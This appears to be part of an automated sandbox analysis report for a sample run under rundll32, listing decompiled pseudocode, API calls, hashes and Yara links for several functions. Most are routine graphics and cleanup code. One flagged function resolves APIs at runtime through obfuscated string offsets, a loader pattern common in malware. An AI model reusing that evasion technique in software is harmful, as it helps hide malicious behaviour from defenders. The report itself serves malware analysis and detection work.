GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,00E33AE3,?,?,00000000,00000000,00000008,?,00000000,00E33B03), ref: 00E33A9F

Strings

`, xrefs: 00E33A00

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: BitsFileMeta
String ID: `
API String ID: 858000408-2679148245
Opcode ID: 48c57459ba4f751f3bff0284b144b06e6243ba9c9def7aeeb6476ed2595fa79c
Instruction ID: 3887a70dc9d96362379d2f036113f23d3bbe84d60e30bf16d5743e6a2caa9ab9
Opcode Fuzzy Hash: 48c57459ba4f751f3bff0284b144b06e6243ba9c9def7aeeb6476ed2595fa79c
Instruction Fuzzy Hash: D9315C75A00208ABDB00EFE4C886EEEBBF8EF49700F515495F904FB281D6759E50DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E3404C Relevance: 10.6, APIs: 7, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E3404C(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				int _t37;
				intOrPtr _t44;
				void* _t46;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t16 = __eax;
				_t49 = _t51;
				_t52 = _t51 + 0xfffffbf0;
				_v8 = __edx;
				_t46 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L4:
					return _t16;
				} else {
					_t16 = E00E31908(_v8, 0xff,  &_v1044);
					_t37 = _t16;
					if(_t37 == 0) {
						goto L4;
					} else {
						_v12 = GetDC(0);
						_v16 = CreateCompatibleDC(_v12);
						_v20 = SelectObject(_v16, _t46);
						_push(_t49);
						_push(0xe340fb);
						_push( *[fs:eax]);
						 *[fs:eax] = _t52;
						SetDIBColorTable(_v16, 0, _t37,  &_v1044);
						_pop(_t44);
						 *[fs:eax] = _t44;
						_push(0xe34102);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						return ReleaseDC(0, _v12);
					}
				}
			}

0x00e3404c
0x00e3404d
0x00e3404f
0x00e34057
0x00e3405a
0x00e3405e
0x00e34102
0x00e34107
0x00e3406f
0x00e3407d
0x00e34082
0x00e34086
0x00000000
0x00e34088
0x00e3408f
0x00e3409b
0x00e340a8
0x00e340ad
0x00e340ae
0x00e340b3
0x00e340b6
0x00e340c7
0x00e340ce
0x00e340d1
0x00e340d4
0x00e340e1
0x00e340ea
0x00e340fa
0x00e340fa
0x00e34086

APIs

Part of subcall function 00E31908: GetObjectA.GDI32(?,00000004), ref: 00E3191F
Part of subcall function 00E31908: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 00E31942

GetDC.USER32(00000000), ref: 00E3408A
CreateCompatibleDC.GDI32(?), ref: 00E34096
SelectObject.GDI32(?), ref: 00E340A3
SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00E340FB,?,?,?,?,00000000), ref: 00E340C7
SelectObject.GDI32(?,?), ref: 00E340E1
DeleteDC.GDI32(?), ref: 00E340EA
ReleaseDC.USER32 ref: 00E340F5

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
String ID:
API String ID: 4046155103-0
Opcode ID: bd2dd37a31041b6dd85c0e6e04a15d17eb34c930f719c891eac4fdf7b8bd9278
Instruction ID: a83845be0e6e54c2895873e9a3285c3ef834a87b598e42ba27d971d4922bf03c
Opcode Fuzzy Hash: bd2dd37a31041b6dd85c0e6e04a15d17eb34c930f719c891eac4fdf7b8bd9278
Instruction Fuzzy Hash: DC111FB1E056196BDB11EBE48856AAEB7FCEB08700F4158A5B604F7281DA74AD80CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E42470 Relevance: 9.2, APIs: 6, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00E42470(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				struct tagRECT _v112;
				signed int _v116;
				long _v120;
				void* __ebp;
				void* _t68;
				void* _t94;
				struct HBRUSH__* _t97;
				intOrPtr _t105;
				void* _t118;
				void* _t127;
				intOrPtr _t140;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				intOrPtr _t153;

				_t148 = __esi;
				_t147 = __edi;
				_t138 = __edx;
				_t127 = __ebx;
				_t150 = _t152;
				_t153 = _t152 + 0xffffff8c;
				_v12 = __edx;
				_v8 = __eax;
				_t68 =  *_v12 - 0xf;
				if(_t68 == 0) {
					_v16 =  *(_v12 + 4);
					if(_v16 == 0) {
						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
					}
					_push(_t150);
					_push(0xe4263e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t153;
					if(_v16 == 0) {
						GetWindowRect( *(_v8 + 0x254),  &_v96);
						E00E56470(_v8,  &_v120,  &_v96);
						_v96.left = _v120;
						_v96.top = _v116;
						E00E55268( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
					}
					E00E5AC94(_v8, _t127, _v12, _t147, _t148);
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(0xe4264c);
					if(_v16 == 0) {
						return EndPaint( *(_v8 + 0x254),  &_v80);
					}
					return 0;
				} else {
					_t94 = _t68 - 5;
					if(_t94 == 0) {
						_t97 = E00E30724( *((intOrPtr*)(_v8 + 0x170)));
						 *((intOrPtr*)( *_v8 + 0x44))();
						FillRect( *(_v12 + 4),  &_v112, _t97);
						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
							GetClientRect( *(_v8 + 0x254),  &_v96);
							FillRect( *(_v12 + 4),  &_v96, E00E30724( *((intOrPtr*)(_v8 + 0x170))));
						}
						_t105 = _v12;
						 *((intOrPtr*)(_t105 + 0xc)) = 1;
					} else {
						_t118 = _t94 - 0x2b;
						if(_t118 == 0) {
							E00E423E4(_t150);
							_t105 = _v8;
							if( *((char*)(_t105 + 0x22f)) == 2) {
								if(E00E4290C(_v8) == 0 || E00E42430(_t138, _t150) == 0) {
									_t146 = 1;
								} else {
									_t146 = 0;
								}
								_t105 = E00E3F750( *(_v8 + 0x254), _t146);
							}
						} else {
							if(_t118 != 0x45) {
								_t105 = E00E423E4(_t150);
							} else {
								E00E423E4(_t150);
								_t105 = _v12;
								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
									_t105 = _v12;
									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
								}
							}
						}
					}
					return _t105;
				}
			}

0x00e42470
0x00e42470
0x00e42470
0x00e42470
0x00e42471
0x00e42473
0x00e42476
0x00e42479
0x00e42481
0x00e42484
0x00e42594
0x00e4259b
0x00e425b3
0x00e425b3
0x00e425b8
0x00e425b9
0x00e425be
0x00e425c1
0x00e425c8
0x00e425d8
0x00e425e6
0x00e425ee
0x00e425f4
0x00e42607
0x00e42607
0x00e42612
0x00e42619
0x00e4261c
0x00e4261f
0x00e42628
0x00000000
0x00e42638
0x00e4263d
0x00e4248a
0x00e4248a
0x00e4248d
0x00e424cd
0x00e424db
0x00e424e9
0x00e424f8
0x00e42514
0x00e42533
0x00e42533
0x00e42538
0x00e4253b
0x00e4248f
0x00e4248f
0x00e42492
0x00e42548
0x00e4254e
0x00e42558
0x00e42568
0x00e42579
0x00e42575
0x00e42575
0x00e42575
0x00e42584
0x00e42584
0x00e42498
0x00e4249b
0x00e42646
0x00e424a1
0x00e424a2
0x00e424a8
0x00e424af
0x00e424b5
0x00e424b8
0x00e424b8
0x00e424af
0x00e4249b
0x00e42492
0x00e4264f
0x00e4264f

APIs

FillRect.USER32 ref: 00E424E9
GetClientRect.USER32 ref: 00E42514
FillRect.USER32 ref: 00E42533

Part of subcall function 00E423E4: CallWindowProcA.USER32 ref: 00E4241E

BeginPaint.USER32(?,?), ref: 00E425AB
GetWindowRect.USER32 ref: 00E425D8
EndPaint.USER32(?,?,00E4264C), ref: 00E42638

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Rect$FillPaintWindow$BeginCallClientProc
String ID:
API String ID: 901200654-0
Opcode ID: 49bd62d265c5b35ca69c864b430260be0c82db1f7c8b68c87904c93b7913d5c6
Instruction ID: dfc2c47f37f64b1f57badbaa92840806e3a60121daf2fa4f1b7a279ceb0ad6e6
Opcode Fuzzy Hash: 49bd62d265c5b35ca69c864b430260be0c82db1f7c8b68c87904c93b7913d5c6
Instruction Fuzzy Hash: 4451F974E00108EFCB00DBA8D989E9DB7F9AF48314F9591A9F508FB262D734AE45CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00E2864C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00E2864C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				char _v12;
				char _v16;
				void* _t36;
				void* _t49;
				CHAR* _t50;
				void* _t60;
				void* _t71;
				char _t72;
				char _t73;
				intOrPtr _t88;
				CHAR* _t91;
				CHAR** _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;

				_t96 = _t97;
				_t98 = _t97 + 0xfffffff4;
				_v16 = 0;
				_t71 = __edx;
				_v8 = __eax;
				_t94 =  &_v12;
				 *[fs:eax] = _t98;
				E00E27ACC(_v8);
				 *[fs:eax] = _t98;
				 *((intOrPtr*)( *_v8 + 0x44))( *[fs:eax], 0xe2877e, _t96,  *[fs:eax], 0xe2879b, _t96, __edi, __esi, __ebx, _t95);
				 *_t94 = E00E14528(_t71);
				while( *( *_t94) - 0xffffffffffffffe1 < 0) {
					 *_t94 = CharNextA( *_t94);
				}
				while(1) {
					_t72 =  *( *_t94);
					if(_t72 == 0) {
						break;
					}
					_t36 = E00E287C4(_v8);
					__eflags = _t72 - _t36;
					if(_t72 != _t36) {
						_t91 =  *_t94;
						while(1) {
							_t73 =  *( *_t94);
							__eflags = _t73 - 0x20;
							if(_t73 <= 0x20) {
								break;
							}
							_t60 = E00E287AC(_v8);
							__eflags = _t73 - _t60;
							if(_t73 != _t60) {
								 *_t94 = CharNextA( *_t94);
								continue;
							}
							break;
						}
						__eflags =  *_t94 - _t91;
						E00E14158( &_v16,  *_t94 - _t91, _t91,  *_t94 - _t91);
						L11:
						 *((intOrPtr*)( *_v8 + 0x38))();
						while(1) {
							__eflags =  *( *_t94) - 0xffffffffffffffe1;
							if( *( *_t94) - 0xffffffffffffffe1 >= 0) {
								break;
							}
							 *_t94 = CharNextA( *_t94);
						}
						_t49 = E00E287AC(_v8);
						__eflags = _t49 -  *( *_t94);
						if(_t49 !=  *( *_t94)) {
							continue;
						}
						_t50 = CharNextA( *_t94);
						__eflags =  *_t50;
						if( *_t50 == 0) {
							__eflags = 0;
							 *((intOrPtr*)( *_v8 + 0x38))();
						}
						do {
							 *_t94 = CharNextA( *_t94);
							__eflags =  *( *_t94) - 0xffffffffffffffe1;
						} while ( *( *_t94) - 0xffffffffffffffe1 < 0);
						continue;
					}
					E00E180C0(_t94,  &_v16, E00E287C4(_v8));
					goto L11;
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(0xe28785);
				return E00E27B88(_v8);
			}

0x00e2864d
0x00e2864f
0x00e28657
0x00e2865a
0x00e2865c
0x00e2865f
0x00e2866d
0x00e28673
0x00e28683
0x00e2868b
0x00e28695
0x00e286a3
0x00e286a1
0x00e286a1
0x00e2875c
0x00e2875e
0x00e28762
0x00000000
0x00000000
0x00e286b4
0x00e286b9
0x00e286bb
0x00e286d3
0x00e286e1
0x00e286e3
0x00e286e5
0x00e286e8
0x00000000
0x00000000
0x00e286ed
0x00e286f2
0x00e286f4
0x00e286df
0x00000000
0x00e286df
0x00000000
0x00e286f4
0x00e286f8
0x00e286ff
0x00e28704
0x00e2870c
0x00e2871b
0x00e28720
0x00e28722
0x00000000
0x00000000
0x00e28719
0x00e28719
0x00e28727
0x00e2872e
0x00e28730
0x00000000
0x00000000
0x00e28735
0x00e2873a
0x00e2873d
0x00e2873f
0x00e28746
0x00e28746
0x00e28749
0x00e28751
0x00e28758
0x00e28758
0x00000000
0x00e28749
0x00e286cc
0x00000000
0x00e286cc
0x00e2876a
0x00e2876d
0x00e28770
0x00e2877d

APIs

CharNextA.USER32(?,?,00000000,00E2879B), ref: 00E2869C
CharNextA.USER32(?,?,00000000,00E2879B), ref: 00E28714
CharNextA.USER32(?,?,?,00000000,00E2879B), ref: 00E28735
CharNextA.USER32(00000000,?,?,?,00000000,00E2879B), ref: 00E2874C

Strings

, xrefs: 00E286E5

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-3916222277
Opcode ID: 9f6518f38635723cdba7a7c8e2d63bb16305239836408114754a76f863ff8134
Instruction ID: aaa6ffc12eb5da2b7a976e42bec9cc12b3c9ecc068eb2a2f64fab80e52608b61
Opcode Fuzzy Hash: 9f6518f38635723cdba7a7c8e2d63bb16305239836408114754a76f863ff8134
Instruction Fuzzy Hash: 01418B74A01158DFDB21EF68DA91899B7F5EF5A30072828AAF481EB351CB30AD41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E31BB4 Relevance: 9.1, APIs: 6, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00E31BB4(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int* _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				struct HDC__* _v44;
				signed int* _t36;
				signed int _t39;
				signed int _t42;
				signed int* _t52;
				signed int _t56;
				intOrPtr _t66;
				void* _t72;
				void* _t73;
				void* _t74;
				intOrPtr _t75;

				_t73 = _t74;
				_t75 = _t74 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t52 = _a8;
				_v24 = _v16 << 4;
				_v20 = E00E17E34(_v24, __eflags);
				 *[fs:edx] = _t75;
				_t56 = _v24;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0xe31eab, _t73, __edi, __esi, __ebx, _t72);
				if(( *_t52 | _t52[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t52;
					_t36[1] = _t52[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_a4[1] = GetSystemMetrics(0xc);
				}
				_v44 = GetDC(0);
				if(_v44 == 0) {
					E00E31078(_t56);
				}
				_push(_t73);
				_push(0xe31c9d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t75;
				_t39 = GetDeviceCaps(_v44, 0xe);
				_t42 = _t39 * GetDeviceCaps(_v44, 0xc);
				if(_t42 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t42;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_push(0xe31ca4);
				return ReleaseDC(0, _v44);
			}

0x00e31bb5
0x00e31bb7
0x00e31bbd
0x00e31bc0
0x00e31bc3
0x00e31bc6
0x00e31bcf
0x00e31bda
0x00e31be8
0x00e31bee
0x00e31bf6
0x00e31bfe
0x00e31c1b
0x00e31c20
0x00e31c25
0x00e31c00
0x00e31c0a
0x00e31c16
0x00e31c16
0x00e31c2f
0x00e31c36
0x00e31c38
0x00e31c38
0x00e31c3f
0x00e31c40
0x00e31c45
0x00e31c48
0x00e31c51
0x00e31c67
0x00e31c6d
0x00e31c7f
0x00e31c81
0x00e31c6f
0x00e31c6f
0x00e31c6f
0x00e31c86
0x00e31c89
0x00e31c8c
0x00e31c9c

APIs

GetSystemMetrics.USER32 ref: 00E31C02
GetSystemMetrics.USER32 ref: 00E31C0E
GetDC.USER32(00000000), ref: 00E31C2A
GetDeviceCaps.GDI32(00000000,0000000E), ref: 00E31C51
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E31C5E
ReleaseDC.USER32 ref: 00E31C97

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CapsDeviceMetricsSystem$Release
String ID:
API String ID: 447804332-0
Opcode ID: 3b53b0a30b27b84aba9727ab401567d5749cdf03b1dff42e875fc8fe2c921dbb
Instruction ID: 0db627d2c0799934effd5fa8f7212c3ca29f40c0cba0dcc712935bca1f0f07e9
Opcode Fuzzy Hash: 3b53b0a30b27b84aba9727ab401567d5749cdf03b1dff42e875fc8fe2c921dbb
Instruction Fuzzy Hash: 71314F74A002049FDB04DF64C995AEDFFF5FB89710F50A5A9E814BB390C670AD41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0108111A Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0108111A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E01081B28(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x10841d0 + 0x1085014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x10841d0 + 0x1085151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E01081B13(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x10841d0 + 0x1085161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x10841d0 + 0x1085174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x10841d0 + 0x1085189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x10841d0 + 0x108519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E01081F9A(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x01081128
0x0108112c
0x010811ed
0x01081132
0x0108114a
0x01081159
0x01081160
0x01081164
0x01081167
0x010811e5
0x010811e6
0x01081169
0x01081176
0x0108117a
0x0108117d
0x00000000
0x0108117f
0x0108118c
0x01081190
0x01081193
0x00000000
0x01081195
0x010811a2
0x010811a6
0x010811a9
0x00000000
0x010811ab
0x010811b8
0x010811bc
0x010811bf
0x00000000
0x010811c1
0x010811c7
0x010811cd
0x010811d2
0x010811d9
0x010811dc
0x00000000
0x010811de
0x010811e1
0x010811e1
0x010811dc
0x010811bf
0x010811a9
0x01081193
0x0108117d
0x01081167
0x010811fb

APIs

Part of subcall function 01081B28: HeapAlloc.KERNEL32(00000000,?,010814E1,00000030,751463F0,00000000), ref: 01081B34

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,01081634,?,?,?,?,?,00000002,?,?), ref: 0108113E
GetProcAddress.KERNEL32(00000000,?), ref: 01081160
GetProcAddress.KERNEL32(00000000,?), ref: 01081176
GetProcAddress.KERNEL32(00000000,?), ref: 0108118C
GetProcAddress.KERNEL32(00000000,?), ref: 010811A2
GetProcAddress.KERNEL32(00000000,?), ref: 010811B8

Part of subcall function 01081F9A: memset.NTDLL ref: 01082019

Memory Dump Source

Source File: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true

Associated: 00000003.00000002.315796531.0000000001085000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1080000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: c1dca074330eff4aa29f9a535c60479bcda833f79977fb129add2bc5727d3a48
Instruction ID: c5d84ba8a3fea5fed5894e006cf1b5bcbc87848307f02e602127604359200b32
Opcode Fuzzy Hash: c1dca074330eff4aa29f9a535c60479bcda833f79977fb129add2bc5727d3a48
Instruction Fuzzy Hash: 6D2123F56082069FDF60EFA9DC44E9A7BE8FF446447014465F9C5C7205EB35E906CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E32024 Relevance: 9.1, APIs: 6, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00E32024(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HPALETTE__* _v12;
				struct HDC__* _v16;
				struct tagBITMAPINFO* _t36;
				intOrPtr _t43;
				struct HBITMAP__* _t47;
				void* _t50;

				_t36 = __ecx;
				_t47 = __eax;
				E00E31ED4(__eax, _a4, __ecx);
				_v12 = 0;
				_v16 = CreateCompatibleDC(0);
				_push(_t50);
				_push(0xe320c1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xfffffff4;
				if(__edx != 0) {
					_v12 = SelectPalette(_v16, __edx, 0);
					RealizePalette(_v16);
				}
				_v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0;
				_pop(_t43);
				 *[fs:eax] = _t43;
				_push(0xe320c8);
				if(_v12 != 0) {
					SelectPalette(_v16, _v12, 0);
				}
				return DeleteDC(_v16);
			}

0x00e3202d
0x00e32031
0x00e3203a
0x00e32041
0x00e3204b
0x00e32050
0x00e32051
0x00e32056
0x00e32059
0x00e3205e
0x00e3206c
0x00e32073
0x00e32073
0x00e32091
0x00e32097
0x00e3209a
0x00e3209d
0x00e320a6
0x00e320b2
0x00e320b2
0x00e320c0

APIs

Part of subcall function 00E31ED4: GetObjectA.GDI32(?,00000054), ref: 00E31EE8

CreateCompatibleDC.GDI32(00000000), ref: 00E32046
SelectPalette.GDI32(?,?,00000000), ref: 00E32067
RealizePalette.GDI32(?), ref: 00E32073
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00E3208A
SelectPalette.GDI32(?,00000000,00000000), ref: 00E320B2
DeleteDC.GDI32(?), ref: 00E320BB

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
String ID:
API String ID: 1221726059-0
Opcode ID: a9098d7f7e98d3ad4f4c7eff5ac3ec9e450aeef4ae76628c7e2a04e29777ed65
Instruction ID: 1ed3a22a34e7dd58b1a87e8456f0ab91299d54caeadd177878a389b4aad29f7e
Opcode Fuzzy Hash: a9098d7f7e98d3ad4f4c7eff5ac3ec9e450aeef4ae76628c7e2a04e29777ed65
Instruction Fuzzy Hash: C8114C75A042047FDB20DBA9CC95F9EBBECAB48710F5194A8BA14F7281D6749944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E11AD0 Relevance: 9.1, APIs: 6, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00E11AD0() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0xe7f5c4 == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(0xe11ba6);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0xe7f04d != 0) {
						_push(0xe7f5cc);
						L00E11368();
					}
					 *0xe7f5c4 = 0;
					_t3 =  *0xe7f624; // 0x901688
					LocalFree(_t3);
					 *0xe7f624 = 0;
					_t19 =  *0xe7f5ec; // 0x902cbc
					while(_t19 != 0xe7f5ec) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E00E113D0(0xe7f5ec);
					E00E113D0(0xe7f5fc);
					E00E113D0(0xe7f628);
					_t14 =  *0xe7f5e4; // 0x902688
					while(_t14 != 0) {
						 *0xe7f5e4 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0xe7f5e4; // 0x902688
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0xe11bad);
					if( *0xe7f04d != 0) {
						_push(0xe7f5cc);
						L00E11370();
					}
					_push(0xe7f5cc);
					L00E11378();
					return 0;
				}
			}

0x00e11ad1
0x00e11adb
0x00e11baf
0x00e11ae1
0x00e11ae3
0x00e11ae4
0x00e11ae9
0x00e11aec
0x00e11af6
0x00e11af8
0x00e11afd
0x00e11afd
0x00e11b02
0x00e11b09
0x00e11b0f
0x00e11b16
0x00e11b1b
0x00e11b35
0x00e11b2e
0x00e11b33
0x00e11b33
0x00e11b42
0x00e11b4c
0x00e11b56
0x00e11b5b
0x00e11b62
0x00e11b66
0x00e11b6d
0x00e11b72
0x00e11b77
0x00e11b7d
0x00e11b80
0x00e11b83
0x00e11b8f
0x00e11b91
0x00e11b96
0x00e11b96
0x00e11b9b
0x00e11ba0
0x00e11ba5
0x00e11ba5

APIs

RtlEnterCriticalSection.KERNEL32(00E7F5CC,00000000,00E11BA6), ref: 00E11AFD
LocalFree.KERNEL32(00901688,00000000,00E11BA6), ref: 00E11B0F
VirtualFree.KERNEL32(?,00000000,00008000,00901688,00000000,00E11BA6), ref: 00E11B2E
LocalFree.KERNEL32(00902688,?,00000000,00008000,00901688,00000000,00E11BA6), ref: 00E11B6D
RtlLeaveCriticalSection.KERNEL32(00E7F5CC,00E11BAD,00901688,00000000,00E11BA6), ref: 00E11B96
RtlDeleteCriticalSection.KERNEL32(00E7F5CC,00E11BAD,00901688,00000000,00E11BA6), ref: 00E11BA0

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
